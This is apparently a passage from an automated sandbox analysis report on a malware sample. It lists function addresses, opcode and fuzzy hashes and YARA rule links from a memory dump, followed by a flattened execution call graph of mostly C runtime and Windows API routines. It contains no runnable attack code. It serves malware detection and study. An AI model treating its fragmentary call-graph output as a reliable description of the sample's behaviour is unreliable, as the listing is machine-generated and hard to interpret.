                          • Instruction ID: 505b4dac5836b2e1cea8ecb14ba6f10eb1a48f3049c01fd44808faee9d4c34e8
                          • Opcode Fuzzy Hash: af9252fe189039e7db0786bdeac96a7fe057f7b0fc1f8e63b490584f04cbcf98
                          • Instruction Fuzzy Hash: B4E0B63681C205CFCB18CFA594542FC7EB8A71F34AF14F02AD18AA21E2E3788585DF24
                          Function 00D71B37 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec37358ac4c11c2bd2b240c132334df042107cb424638c721e11f11ad76d5548
                          • Instruction ID: e3f6dc101e1422b9f2c210f955ddf39f5f8b4079b825ea6121ef711b33804301
                          • Opcode Fuzzy Hash: ec37358ac4c11c2bd2b240c132334df042107cb424638c721e11f11ad76d5548
                          • Instruction Fuzzy Hash: 73E026F8C0A284AFC741CFB8C81429C7FF4AB06300F0542CBC444D3252D6B10E05EB11
                          Function 00D70CE1 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01afe04182b1f2cf1f92a95d73ea7befd80328a15cde2477135d62416a4387da
                          • Instruction ID: 132655de6916fa88375ffb45c3f48dd77c0951eb43599ff93f7b7987d148d607
                          • Opcode Fuzzy Hash: 01afe04182b1f2cf1f92a95d73ea7befd80328a15cde2477135d62416a4387da
                          • Instruction Fuzzy Hash: 87F03974909288DFDB12DFA8D86469C7FB0AF4A305F1881EBD884973A1D3345A04DF51
                          Function 00D717F0 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d76632eae37fc49c0890f9015201c29b4e82409ecd4d86ad2a5996a2132f8b42
                          • Instruction ID: 9e1f010b6aff983be083b701a7896d96c20e72fbfe1bf81d0649de1d7b0f8d73
                          • Opcode Fuzzy Hash: d76632eae37fc49c0890f9015201c29b4e82409ecd4d86ad2a5996a2132f8b42
                          • Instruction Fuzzy Hash: 26E09B3480E1886FCB02DB78D41159D7F709B43300F14C2DAC84557151D7305905DB53
                          Function 00D70801 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31490599f84c1e01c8a075bd62102a2fb681d8ad540e45a8dc4de088cb976e42
                          • Instruction ID: 6658209e974462cbb237f918da2ca9af86a8b439c1193c501fffa4b0d2e50a20
                          • Opcode Fuzzy Hash: 31490599f84c1e01c8a075bd62102a2fb681d8ad540e45a8dc4de088cb976e42
                          • Instruction Fuzzy Hash: 71E04F7484E2C4AFC316D7B498606697F745B43200F0801DFC444961E2D6750D05CB62
                          Function 00D71018 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d7eac925ba3b8ff48d2370d8aa30efe41a3c7491579c3fe69f3238670e3dac2
                          • Instruction ID: 8fdc496f7f3af1ba2145ebda462f626125ad988ecb76a2da9dd667b37085b2cb
                          • Opcode Fuzzy Hash: 6d7eac925ba3b8ff48d2370d8aa30efe41a3c7491579c3fe69f3238670e3dac2
                          • Instruction Fuzzy Hash: 88E04F7480A3CADED717DBA4992536CBF70AF47244F0841DBC4945A5A3D7354E42CB12
                          Function 00D73951 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0391e63345e8180f58bd0b6417a501beff5e22e0399049447e0946d31b01b3a9
                          • Instruction ID: 58299eb07a4a1faf4045d39f1de28ddedfd949d891de13fb87cdbdc7f11eb6f9
                          • Opcode Fuzzy Hash: 0391e63345e8180f58bd0b6417a501beff5e22e0399049447e0946d31b01b3a9
                          • Instruction Fuzzy Hash: 8AE01A7A901218AFDB50DF90CD40BE8BBB9EB48315F1481D9D919A7290CB359F86DF10
                          Function 00D73145 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c255f2d6f16e612677add450e20d39a85954b0006eeea7cec88cf88ef65281ed
                          • Instruction ID: 7680f5d1c9de06cc24e80eecf41e73345d3f2bc5051235fed982bf108f20fb67
                          • Opcode Fuzzy Hash: c255f2d6f16e612677add450e20d39a85954b0006eeea7cec88cf88ef65281ed
                          • Instruction Fuzzy Hash: 20E03234A08229CFDB24CE01C840BA9B3B5AB48304F80D5E9848DA3244EB319F85EF30
                          Function 00D70AD0 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb7e7a5802a87c90b86778ca2a439d11237fbe389346b1d240df046a547fbdaa
                          • Instruction ID: af07c3e2040ea7f2dccf377340110c8e7db44f31db23813e261112f65265dd47
                          • Opcode Fuzzy Hash: bb7e7a5802a87c90b86778ca2a439d11237fbe389346b1d240df046a547fbdaa
                          • Instruction Fuzzy Hash: 24D02B7884E384AECB12CBB4E820A6D3FB45F42200F0442CFC644971E3C6B40E08DB21
                          Function 00D733E0 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad8b12a18a1397818a4db976344847ffa23abfe9db507b0c1e9753cce0111acc
                          • Instruction ID: b97696e54ef4602d562c3efa0798afd794ecd4179d414ce80ed963823060ec4a
                          • Opcode Fuzzy Hash: ad8b12a18a1397818a4db976344847ffa23abfe9db507b0c1e9753cce0111acc
                          • Instruction Fuzzy Hash: 5AE0E579A08218DFDF20CF94CC80BECBBB5AB48304F20809A950CAB381D7359A85DF00
                          Function 00D705B8 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ffe399b79e0e1b90a1573fffec5790937ab2e57452bc8343cdf53670944bd03
                          • Instruction ID: 58fcd9d1c356e3b3586006ad05076cea343e0125bf362dd6277f8842526fb07d
                          • Opcode Fuzzy Hash: 1ffe399b79e0e1b90a1573fffec5790937ab2e57452bc8343cdf53670944bd03
                          • Instruction Fuzzy Hash: 08E08C30409144AEC705CBE8DC51AAD7F389746312F14419BC808E2191DB31080ACE20
                          Function 00D70162 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e29831258a1c586d9b24e8950ad89858a00b4dc851ca65972ecd3868a048a519
                          • Instruction ID: 3d3b6916540be0dfe72ef6ab01e3577cd33adb0e602866b1358ac80299926718
                          • Opcode Fuzzy Hash: e29831258a1c586d9b24e8950ad89858a00b4dc851ca65972ecd3868a048a519
                          • Instruction Fuzzy Hash: 24E0260A80E2D086CB02CA646892348BFB48F03318F0914CFC1C81B087C600410DC72A
                          Function 00D70CF0 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28ebbd3af5cf11d0846a01c16f883f1ab0defeb32b6704ec8839fb90e65da81b
                          • Instruction ID: c5acecf45eca38b2ba7cd29ecf2aa40c009ff3341dffe55664dd3909e9c6c2f3
                          • Opcode Fuzzy Hash: 28ebbd3af5cf11d0846a01c16f883f1ab0defeb32b6704ec8839fb90e65da81b
                          • Instruction Fuzzy Hash: B8E0B638D04208EFCB14DFA9D5556ACBFB4EF89301F1481EAD844573A0D734AA41DF91
                          Function 00D720F0 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d857c1a350ba319f5ba5407c2be5ac0fde1273aa9be02cdfba5609322e4a43d1
                          • Instruction ID: 3968f9810d045b50956ef96759a4d06fe812595e2ca457f2abf14afd93832af0
                          • Opcode Fuzzy Hash: d857c1a350ba319f5ba5407c2be5ac0fde1273aa9be02cdfba5609322e4a43d1
                          • Instruction Fuzzy Hash: 4BE0B674910208EFC744DFA8D58465CBBF4AB09301F6041A9D90897360E7309A44DF51
                          Function 00D71800 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc3334b97fa78d1d1a0e5307d35d2cfe5cf9b6ea23cc9c02b37a7559ed3d2a90
                          • Instruction ID: d678aa8747837d4999ac8cdadde1e11a0f3e5cb20efc1d29ddab2f0142877760
                          • Opcode Fuzzy Hash: fc3334b97fa78d1d1a0e5307d35d2cfe5cf9b6ea23cc9c02b37a7559ed3d2a90
                          • Instruction Fuzzy Hash: 51D05E3480910CEBCB04DFA8E9516ADBBB8AB82300F1092A9C80823240D7705E46EBA6
                          Function 00D721B8 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1509d6cccad03149069044bf6dfd6c478a0b54f09a2191cb88d8eede93eced6f
                          • Instruction ID: f54dc30d671ccc6d824c49f7ef8ee7600c385445b7df1f1aaf5992c9a7e67514
                          • Opcode Fuzzy Hash: 1509d6cccad03149069044bf6dfd6c478a0b54f09a2191cb88d8eede93eced6f
                          • Instruction Fuzzy Hash: A5D05E30C05208EBC704DFA8EC406BDBBB8FB42301F6081A9CC4833240D7301E56DB91
                          Function 00D722D8 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b49d46a1aa718cc93aac13ad8784118ad18b6949164472cdb8b5b7f6935d77
                          • Instruction ID: fce5baeed660ef5c52f4c231690d32c770099585ed2622e9a56f9344d7b2469a
                          • Opcode Fuzzy Hash: 98b49d46a1aa718cc93aac13ad8784118ad18b6949164472cdb8b5b7f6935d77
                          • Instruction Fuzzy Hash: D4D01730D00248EFCB48EFA8D88579DBBF4AB04300F1080AAC80893340E7309A84DB91
                          Function 00D705C8 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3f7295df1ddaeef785f91d917ed3b35622a74326f32af277e90aaf6c3e49839
                          • Instruction ID: f688876c862f19680c467442c9c29ecd216de04dc787b37db2585dd638dc1118
                          • Opcode Fuzzy Hash: d3f7295df1ddaeef785f91d917ed3b35622a74326f32af277e90aaf6c3e49839
                          • Instruction Fuzzy Hash: C7D0C970401209EBC704DBE9D955B5DBB68A746742F04519AD40863290EB711D01DAA5
                          Function 00D70FE8 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbad7b3a2c81bf04a77752b3ae74237d6b4b3e6c325047c2a751744ab79457cb
                          • Instruction ID: 80c9124c3794cbf095126a0fddc59f4c534e431ec7b05d275ae1a191a8d9933b
                          • Opcode Fuzzy Hash: cbad7b3a2c81bf04a77752b3ae74237d6b4b3e6c325047c2a751744ab79457cb
                          • Instruction Fuzzy Hash: A7D05E34800248EFC714DFE8E81826CBFB4AB05201F0840AAC84412290E7301A45DF91
                          Function 00D71B48 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5832bfcfa3eabd8ae7335c8cf5a3a048377f6e4aab570b69d6f3456ffb1fa5b6
                          • Instruction ID: f91e157021a411d275d8477b8ccd530123c8f44f882f29fb97dc292ce08ebb1e
                          • Opcode Fuzzy Hash: 5832bfcfa3eabd8ae7335c8cf5a3a048377f6e4aab570b69d6f3456ffb1fa5b6
                          • Instruction Fuzzy Hash: 78D0C979901208EFCB44DFEDDA0975DBBF8EB09351F1485AAD808D3251E7315E01EB61
                          Function 00D70AE0 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b925313f47cb06490a02b8c0ebecbcf4cfc36125e0a8ed4bff62a03f2057066
                          • Instruction ID: 332b0caac9ae55b25cb5652944a5826e9bd621843b4e6c64ffd7f55de39ed740
                          • Opcode Fuzzy Hash: 0b925313f47cb06490a02b8c0ebecbcf4cfc36125e0a8ed4bff62a03f2057066
                          • Instruction Fuzzy Hash: C8C0123044521DEBC704DBE9D81576D77AC9741245F044199C50813290DB715E40DB95
                          Function 00D72750 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cec2ebba3e884378f94c5104af24312706be328c26fae29b74680e55c1373e1a
                          • Instruction ID: cf38ed6efecc2477bac3ae86b3554c08a1e45474445b3b39e33a80a2bd6c4985
                          • Opcode Fuzzy Hash: cec2ebba3e884378f94c5104af24312706be328c26fae29b74680e55c1373e1a
                          • Instruction Fuzzy Hash: C4C0123080114DABC718DF99D911B6E776CD741354F444099C40813250EB311D00EBA1
                          Function 00D71D44 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d4739d94ba39a3e1cf75f21a41b8d83cdba3c971245e9f0f4e7860baa3fda97
                          • Instruction ID: 3b51b4900e08dee070503d0bb98ee6715f47bbb458c06842e077c44c1d7dfab3
                          • Opcode Fuzzy Hash: 6d4739d94ba39a3e1cf75f21a41b8d83cdba3c971245e9f0f4e7860baa3fda97
                          • Instruction Fuzzy Hash: F2C09B35E44405E7CB10DBD4F4150FCB735DBCA233F101062D11E93550972099559A55
                          Function 00D7022D Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b6f4236f113e3f290eb558574ecec0bd1e9e08d69b3c38460208a51742869d5
                          • Instruction ID: a7f40816959fd3f462625d4a8ce506281d60631a23e3b367feb0f860a6fff3c5
                          • Opcode Fuzzy Hash: 4b6f4236f113e3f290eb558574ecec0bd1e9e08d69b3c38460208a51742869d5
                          • Instruction Fuzzy Hash: B4C00230918216CBCB14DBF0D8588ADBB3ABB8F302B20A119A54E631A6DB305802DE54
                          Function 00D719B6 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aecc942aca0b57806319809a05e79ad7d15d60a1fe1f12124a63ab72d67cbb29
                          • Instruction ID: 965663a2db0e240463d7ea5f0341d7d3c4c0d80f09b2cfd9a22a085e1f0a3480
                          • Opcode Fuzzy Hash: aecc942aca0b57806319809a05e79ad7d15d60a1fe1f12124a63ab72d67cbb29
                          • Instruction Fuzzy Hash: E6B09238D5A014E6C708DA48E4518BCA23DAB8B381B20E604A04E231127920E8019524
                          Function 00D70216 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1549c6a7c43a0a985fdc3d7abd85d510a46cc988cc2e24c11bd4c65c97fb4bc
                          • Instruction ID: ce38f4e8d415ea391a915308418124c5d24dc8b554cfcaad469dcb49fa8f20e7
                          • Opcode Fuzzy Hash: c1549c6a7c43a0a985fdc3d7abd85d510a46cc988cc2e24c11bd4c65c97fb4bc
                          • Instruction Fuzzy Hash: C7C04C31507141C7D3009B60E8097663B72D702315F649006916B672D5D7748854D615
                          Function 00D703B8 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56ba101aac5958102b1d59169776916b4054eaf9a66ad5fab767cb3dddc2a592
                          • Instruction ID: 2f7e04d6511e3eea3c53af698ac6e492cfe51b883fe7a2255ff0e66c4c5e0ff6
                          • Opcode Fuzzy Hash: 56ba101aac5958102b1d59169776916b4054eaf9a66ad5fab767cb3dddc2a592
                          • Instruction Fuzzy Hash: 98B0023509E404DFD6111678E44C578B955EB4530577555A0614F871F1D7905501AD14

                          Execution Graph

                          Execution Coverage:6.6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:2.6%
                          Total number of Nodes:1698
                          Total number of Limit Nodes:14
                          execution_graph 7041 10008640 7044 10008657 7041->7044 7045 10008665 7044->7045 7046 10008679 7044->7046 7049 10006368 __dosmaperr 20 API calls 7045->7049 7047 10008681 7046->7047 7048 10008693 7046->7048 7051 10006368 __dosmaperr 20 API calls 7047->7051 7054 100054a7 __fassign 38 API calls 7048->7054 7055 10008652 7048->7055 7050 1000866a 7049->7050 7052 100062ac ___std_exception_copy 26 API calls 7050->7052 7053 10008686 7051->7053 7052->7055 7056 100062ac ___std_exception_copy 26 API calls 7053->7056 7054->7055 7056->7055 7612 10007a80 7613 10007a8d 7612->7613 7614 1000637b _abort 20 API calls 7613->7614 7615 10007aa7 7614->7615 7616 1000571e _free 20 API calls 7615->7616 7617 10007ab3 7616->7617 7618 1000637b _abort 20 API calls 7617->7618 7621 10007ad9 7617->7621 7620 10007acd 7618->7620 7619 10005eb7 11 API calls 7619->7621 7622 1000571e _free 20 API calls 7620->7622 7621->7619 7623 10007ae5 7621->7623 7622->7621 6952 10007103 GetCommandLineA GetCommandLineW 6953 10005303 6956 100050a5 6953->6956 6965 1000502f 6956->6965 6959 1000502f 5 API calls 6960 100050c3 6959->6960 6969 10005000 6960->6969 6963 10005000 20 API calls 6964 100050d9 6963->6964 6966 10005048 6965->6966 6967 10002ada _ValidateLocalCookies 5 API calls 6966->6967 6968 10005069 6967->6968 6968->6959 6970 1000502a 6969->6970 6971 1000500d 6969->6971 6970->6963 6972 10005024 6971->6972 6973 1000571e _free 20 API calls 6971->6973 6974 1000571e _free 20 API calls 6972->6974 6973->6971 6974->6970 7057 1000af43 7058 1000af59 7057->7058 7059 1000af4d 7057->7059 7059->7058 7060 1000af52 CloseHandle 7059->7060 7060->7058 7061 1000a945 7062 1000a96d 7061->7062 7063 1000a9a5 7062->7063 7064 1000a997 7062->7064 7065 1000a99e 7062->7065 7070 1000aa17 7064->7070 7074 1000aa00 7065->7074 7071 1000aa20 7070->7071 7078 1000b19b 7071->7078 7075 1000aa20 7074->7075 7076 1000b19b __startOneArgErrorHandling 21 API calls 7075->7076 7077 1000a9a3 7076->7077 7079 1000b1da __startOneArgErrorHandling 7078->7079 7081 1000b25c __startOneArgErrorHandling 7079->7081 7088 1000b59e 7079->7088 7086 1000b286 7081->7086 7091 100078a3 7081->7091 7083 1000b292 7085 10002ada _ValidateLocalCookies 5 API calls 7083->7085 7087 1000a99c 7085->7087 7086->7083 7095 1000b8b2 7086->7095 7102 1000b5c1 7088->7102 7092 100078cb 7091->7092 7093 10002ada _ValidateLocalCookies 5 API calls 7092->7093 7094 100078e8 7093->7094 7094->7086 7096 1000b8d4 7095->7096 7097 1000b8bf 7095->7097 7099 10006368 __dosmaperr 20 API calls 7096->7099 7098 1000b8d9 7097->7098 7100 10006368 __dosmaperr 20 API calls 7097->7100 7098->7083 7099->7098 7101 1000b8cc 7100->7101 7101->7083 7103 1000b5ec __raise_exc 7102->7103 7104 1000b7e5 RaiseException 7103->7104 7105 1000b5bc 7104->7105 7105->7081 7719 1000a1c6 IsProcessorFeaturePresent 7720 10007bc7 7721 10007bd3 ___scrt_is_nonwritable_in_current_image 7720->7721 7722 10007c0a _abort 7721->7722 7728 10005671 RtlEnterCriticalSection 7721->7728 7724 10007be7 7725 10007f86 __fassign 20 API calls 7724->7725 7726 10007bf7 7725->7726 7729 10007c10 7726->7729 7728->7724 7732 100056b9 RtlLeaveCriticalSection 7729->7732 7731 10007c17 7731->7722 7732->7731 7106 10005348 7107 10003529 ___vcrt_uninitialize 8 API calls 7106->7107 7108 1000534f 7107->7108 7109 10007b48 7119 10008ebf 7109->7119 7113 10007b55 7132 1000907c 7113->7132 7116 10007b7f 7117 1000571e _free 20 API calls 7116->7117 7118 10007b8a 7117->7118 7136 10008ec8 7119->7136 7121 10007b50 7122 10008fdc 7121->7122 7123 10008fe8 ___scrt_is_nonwritable_in_current_image 7122->7123 7156 10005671 RtlEnterCriticalSection 7123->7156 7125 1000905e 7170 10009073 7125->7170 7127 10009032 RtlDeleteCriticalSection 7130 1000571e _free 20 API calls 7127->7130 7128 1000906a _abort 7128->7113 7131 10008ff3 7130->7131 7131->7125 7131->7127 7157 1000a09c 7131->7157 7133 10009092 7132->7133 7134 10007b64 RtlDeleteCriticalSection 7132->7134 7133->7134 7135 1000571e _free 20 API calls 7133->7135 7134->7113 7134->7116 7135->7134 7137 10008ed4 ___scrt_is_nonwritable_in_current_image 7136->7137 7146 10005671 RtlEnterCriticalSection 7137->7146 7139 10008f77 7151 10008f97 7139->7151 7142 10008f83 _abort 7142->7121 7144 10008e78 66 API calls 7145 10008ee3 7144->7145 7145->7139 7145->7144 7147 10007b94 RtlEnterCriticalSection 7145->7147 7148 10008f6d 7145->7148 7146->7145 7147->7145 7154 10007ba8 RtlLeaveCriticalSection 7148->7154 7150 10008f75 7150->7145 7155 100056b9 RtlLeaveCriticalSection 7151->7155 7153 10008f9e 7153->7142 7154->7150 7155->7153 7156->7131 7158 1000a0a8 ___scrt_is_nonwritable_in_current_image 7157->7158 7159 1000a0b9 7158->7159 7160 1000a0ce 7158->7160 7161 10006368 __dosmaperr 20 API calls 7159->7161 7169 1000a0c9 _abort 7160->7169 7173 10007b94 RtlEnterCriticalSection 7160->7173 7163 1000a0be 7161->7163 7165 100062ac ___std_exception_copy 26 API calls 7163->7165 7164 1000a0ea 7174 1000a026 7164->7174 7165->7169 7167 1000a0f5 7190 1000a112 7167->7190 7169->7131 7438 100056b9 RtlLeaveCriticalSection 7170->7438 7172 1000907a 7172->7128 7173->7164 7175 1000a033 7174->7175 7176 1000a048 7174->7176 7177 10006368 __dosmaperr 20 API calls 7175->7177 7182 1000a043 7176->7182 7193 10008e12 7176->7193 7178 1000a038 7177->7178 7180 100062ac ___std_exception_copy 26 API calls 7178->7180 7180->7182 7182->7167 7183 1000907c 20 API calls 7184 1000a064 7183->7184 7199 10007a5a 7184->7199 7186 1000a06a 7206 1000adce 7186->7206 7189 1000571e _free 20 API calls 7189->7182 7437 10007ba8 RtlLeaveCriticalSection 7190->7437 7192 1000a11a 7192->7169 7194 10008e2a 7193->7194 7195 10008e26 7193->7195 7194->7195 7196 10007a5a 26 API calls 7194->7196 7195->7183 7197 10008e4a 7196->7197 7221 10009a22 7197->7221 7200 10007a66 7199->7200 7201 10007a7b 7199->7201 7202 10006368 __dosmaperr 20 API calls 7200->7202 7201->7186 7203 10007a6b 7202->7203 7204 100062ac ___std_exception_copy 26 API calls 7203->7204 7205 10007a76 7204->7205 7205->7186 7207 1000adf2 7206->7207 7208 1000addd 7206->7208 7209 1000ae2d 7207->7209 7214 1000ae19 7207->7214 7210 10006355 __dosmaperr 20 API calls 7208->7210 7211 10006355 __dosmaperr 20 API calls 7209->7211 7212 1000ade2 7210->7212 7215 1000ae32 